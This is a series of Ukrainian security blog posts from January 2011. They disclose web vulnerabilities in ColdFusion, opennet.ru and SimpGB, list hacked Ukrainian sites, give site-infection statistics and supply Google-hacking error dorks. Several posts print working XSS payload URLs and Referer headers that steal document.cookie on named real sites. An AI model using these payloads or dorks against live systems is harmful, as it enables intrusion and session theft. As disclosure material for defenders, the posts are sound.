15:14 28.01.2011
В даній добірці уразливості в веб додатках:
- Sun Java JDK/JRE AWT Library Invalid Pointer Vulnerability (деталі)
- Sun Java JDK/JRE AWT Library Invalid Index Vulnerability (деталі)
- Sun Java JDK/JRE Soundbank Resource Parsing Buffer Overflow (деталі)
- XSS in Horde IMP <=4.3.7, fetchmailprefs.php (деталі)
- FreePBX recordings interface allows remote code execution (деталі)
- Sun Java JDK/JRE Soundbank Resource Name Buffer Overflow (деталі)
- Oracle Java Runtime Environment Image FIle Buffer Overflow Vulnerability (деталі)
- SQL Injection and XSS in Motorito < v2.0 Ni 483 (деталі)
- CollabNet Subversion Edge Log Parser XSS/Code Injection Vulnerability (деталі)
- SQL injection vulnerability in Entrans (деталі)
Опубліковано в Уразливості | Без Коментарів »
23:53 27.01.2011
В 2008 - 2010 роках я знаходив уразливості на багатьох сайтах на ColdFusion. Це SQL DB Structure Extraction, Full path disclosure та Cross-Site Scripting уразливості. В останнє я виявив подібні уразливості на www.sec.ru.
Вони мають місце на сторінці детального повідомлення про помилку (що часто виводиться на ColdFusion сайтах). І враховуючи те, що ці дірки відносяться до Adobe ColdFusion, 16.11.2010 я приватно повідомив про це Adobe, але вони проігнорували моє повідомлення. Тому я оприлюднюю детальну інформацію про уразливості.
SQL DB Structure Extraction:
http://site/page.cfm?id=-
Виводиться інформація про SQL запит (якщо даний веб додаток працює з СУБД).
Full path disclosure:
http://site/page.cfm?id=-
Виводиться повний шлях на сервері.
XSS:
При запиті до сторінки http://site/page.cfm?id=- з User-Agent “Mozilla<body onload=alert(document.cookie)>” можна було виконати код. Уразливість працювала в 2009 та 25.02.2010, зараз вона вже виправлена (вірогідно в останніх версіях ColdFusion).
XSS:
http://site/page.cfm?id=%3Cbody%20onload=alert(document.cookie)%3E
Вектор через тег script, що працював в 2009 та 25.02.2010, вже виправили в останніх версіях ColdFusion, але можна атакувати через багато інших векторів (наприклад, через тег body).
Уразливі потенційно всі версії Adobe ColdFusion.
Опубліковано в Уразливості | Без Коментарів »
22:40 27.01.2011
Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.
- http://www.tk-kiev.com.ua (хакером Down Twon HaCkEr) - 14.01.2011, зараз сайт вже виправлений адмінами
- http://www.lie-detector.biz (хакерами з Albanian Hackers Group) - 20.01.2011, зараз сайт вже виправлений адмінами
- http://shop.zdravnik.com.ua (хакером blood black)
- http://15workdaily.com (хакером Dr.TaiGaR)
- http://blog.arm-eko.rv.ua (хакерами з AHC)
Зазначу, що взломаний сайт 15workdaily.com - це e-commerce сайт з логотипами Verified by VISA, MasterCard SecureCode та VeriSign Secured. Про діряві сайти, що ховаються за секюріті логотипами я вже писав в статті Справжня безпека сайтів із секюріті логотипами, а це наочний приклад хакнутого подібного сайта.
Опубліковано в Новини сайту, Дослідження | 2 Коментарів »
15:29 27.01.2011
14.06.2010
У листопаді, 05.11.2009, я знайшов Cross-Site Scripting уразливості (в тому числі persistent XSS) на секюріті проекті http://www.opennet.ru. Про що найближчим часом сповіщу адміністрацію проекту.
Раніше я вже писав про уразливості на opennet.ru.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
27.01.2011
XSS (persistent):
При доступі на сторінку http://www.opennet.ru /cgi-bin/opennet/bookmark.cgi?submit=add з заголовком:
Referer: http://www.opennet.ru/"><script>alert(document.cookie)</script>
Або через GET запит:
http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi?url=http://www.opennet.ru/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&title=1&submit=%E4%CF%C2%C1%D7%C9%D4%D8
Сберігається “закладка” (для даного користувача). Код спрацьовує одразу, а також при заході на сторінку http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi.
Дані уразливості вже виправлені, але даний захист можна обійти використовуючи наступну Strictly social XSS:
Strictly social persistent XSS:
http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi?url=javascript:alert(document.cookie)//http://opennet.ru&title=1&submit=%E4%CF%C2%C1%D7%C9%D4%D8
Сберігається “закладка” (для даного користувача). Код спрацьовує при кліку на сторінці http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi.
XSS:
http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi?title=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.opennet.ru/cgi-bin/opennet/bookmark.cgi?url=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
З даних уразливостей все ще не всі виправлені.
Опубліковано в Уразливості | Без Коментарів »
22:48 26.01.2011
Починаючи з 2008 року я став проводити дослідження інфікованості сайтів в Уанеті та наводити інформацію про це в своїх звітах про хакерську активність в Уанеті. Наведу порівняльну статистику інфікованості Уанета за останні роки.
Статистика буде за 2008 - 2010 роки враховуючи, що лише з 2008 я веду статистику інфікованих сайтів. Статистичні дані базуються на моїх дослідженнях хакерської активності в Уанеті в 2008, 2009 і 2010 роках.
За весь 2008 рік в Уанеті було інфіковано 4 веб сайти.
За весь 2009 рік в Уанеті було інфіковано 67 веб сайтів.
За весь 2010 рік в Уанеті було інфіковано 264 веб сайтів.

Збільшення заражених сайтів свідчить про зростання кримінальних взломів сайтів (коли на взломаних сайтах розміщуються віруси).
Динаміка зараження сайтів в Уанеті.
В 2009 році активність зросла на 1575% порівняно з 2008 роком (зростання в 16,75 рази).
В 2010 році активність зросла на 294% порівняно з 2009 роком (зростання в 3,94 рази). В порівнянні з 2008 роком активність зросла на 6500% (в 66 разів).

Як видно зі статистики, кількість інфікованих сайтів в Уанеті в останні роки стабільно зростає.
Опубліковано в Дослідження | Без Коментарів »
19:04 26.01.2011
Продовжу тему “Error” Гугл хакінга (”Error” Google hacking). Котрий є різновидом Гугл хакінга - використання пошукових систем (зокрема Гугла) для пошуку уразливостей на сайтах.
Дана методика передбачає використання Гугла (чи інших пошукових систем) з метою пошуку повідомлень на сайтах про помилки, і дозволяє знайти важливу інформацію стосовно даних сайтів. За допомогою спеціальних пошукових запитів (дорків) можна знайти Full path disclosure та Information leakage уразливості на різноманітних сайтах в Інтернеті.
Новий перелік “еррор” пошукових запитів:
“Fatal error”
“Fatal error: Call to undefined”
“Fatal error: Call to undefined function”
“Fatal error: Call to undefined method”
“Fatal error: Call to a member”
“Fatal error: Call to a member function”
“Fatal error: Allowed memory size”
“Parse error”
“Parse error: syntax error”
“Parse error: parse error”
Опубліковано в Статті | Без Коментарів »
15:10 26.01.2011
В даній добірці уразливості в веб додатках:
- Sun Java Runtime CMM readMabCurveData Remote Code Execution Vulnerability (деталі)
- Sun Java Runtime Environment MixerSequencer Invalid Array Index Remote Code Execution Vulnerability (деталі)
- Sun Java Runtime Environment JPEGImageReader stepX Remote Code Execution Vulnerability (деталі)
- Free Simple CMS path sanitization errors (деталі)
- Sun Java Runtime Environment Trusted Methods Chaining Remote Code Execution Vulnerability (деталі)
- Sun Java Runtime Environment MIDI File metaEvent Remote Code Execution Vulnerability (деталі)
- Sun Java JDK/JRE Unpack200 Buffer Overflow Vulnerability (деталі)
- Reflected XSS in Atmail WebMail < v6.2.0 (деталі)
- TimeTrack 1.2.4 Joomla Component Multiple SQL Injection Vulnerabilities (деталі)
- BSI Hotel Booking System Admin Login Bypass Vulnerability (деталі)
Опубліковано в Уразливості | Без Коментарів »
22:48 25.01.2011
Про уразливості у флешках та пов’язаних з флешем я писав багато разів в себе в новинах за весь роботи мого сайта, зокрема в статтях XSS уразливості в 8 мільйонах флеш файлах та XSS уразливості в 34 мільйонах флеш файлах.
Aung Khant з YGN Ethical Hacker Group нещодавно презентував новий секюріті інструмент Known Flash-based XSS and Content spoofing Hunter. Це веб додаток на JavaScript, який перевіряє флешки на найбільш поширені уразливості.
Вам потрібно лише ввести URL флешки, яку ви бажаєте перевірити, і даний інструмент перевірить вказаний swf-файл на найбільш поширені Cross-Site Scripting and Content Spoofing уразливості. Він звісно не перевірить всіх можливих уразливостей (в тому числі всіх можливих варіантів XSS та Content Spoofing), але все рівно може стати в нагоді флеш розробникам та адмінам сайтів, що використовують флешки. Лише потрібно трохи покращити даний веб додаток, про що я вже написав автору.
А для більш детальної перевірки флешек на уразливості потрібно або самому їх детально перевіряти, або замовляти аудит безпеки.
Опубліковано в Програми | Без Коментарів »
19:10 25.01.2011
В новій главі свого Посібника з безпеки, про яку я згадував на минулому тижні, я розповів про небезпеки Full path disclosure уразливостей.
Витік повного шляху (Full path disclosure) - це уразливість, що призводить до витоку повного шляху на сервері. Це один з найбільш поширених витоків інформації, як я вже зазначав в своїх статтях про “Warning” Google хакінг та “Error” Google хакінг, де я наводив приклади пошукових запитів, що виводять мільйони вразливих сайтів. І Full path disclosure дірки несуть в собі небезпеку для сайтів.
Даний тип уразливостей може бути використаний:
- Для отримання інформації про структуру папок на сервері. Що може бути в подальшому використано для проведення Directory Traversal, Local File Inclusion та SSI Injection атак.
- Для знаходження прихованих ресурсів на сайті з отриманої структури папок.
- Для отримання інформації про логін до ftp акаунту та інших сервісів сервера.
- Для отримання інформації про назву БД та логін до акаунту СУБД.
Також в даній главі свого посібника я розповів про методи захисту від Full path disclosure уразливостей. Наведені методи захисту для мов програмування Perl і PHP.
Опубліковано в Статті | Без Коментарів »
15:02 25.01.2011
17.11.2010
У липні, 15.07.2010, я знайшов Cross-Site Scripting, Brute Force, Insufficient Anti-automation та Abuse of Functionality уразливості в SimpGB. Дані уразливості я виявив на різних сайтах, де використовується даний веб додаток. Про що найближчим часом повідомлю розробникам.
Раніше я вже писав про уразливості в SimpGB.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатку.
25.01.2011
XSS:
POST запит на сторінці http://site/guestbook.php в параметрах poster, postingid та location в функції Preview. Якщо в гостьовій книзі використовується капча, то для атаки необхідний робочий код капчі. Або через GET запит:
http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview
http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview
http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview
Brute Force:
http://site/admin/index.php
Insufficient Anti-automation:
http://site/admin/pwlost.php
В даному функціоналі немає захисту від автоматизованих запитів.
Abuse of Functionality:
http://site/admin/pwlost.php
В даному функціоналі можна виявляти логіни.
Уразливі SimpGB v1.49.02 та попередні версії.
Опубліковано в Уразливості | Без Коментарів »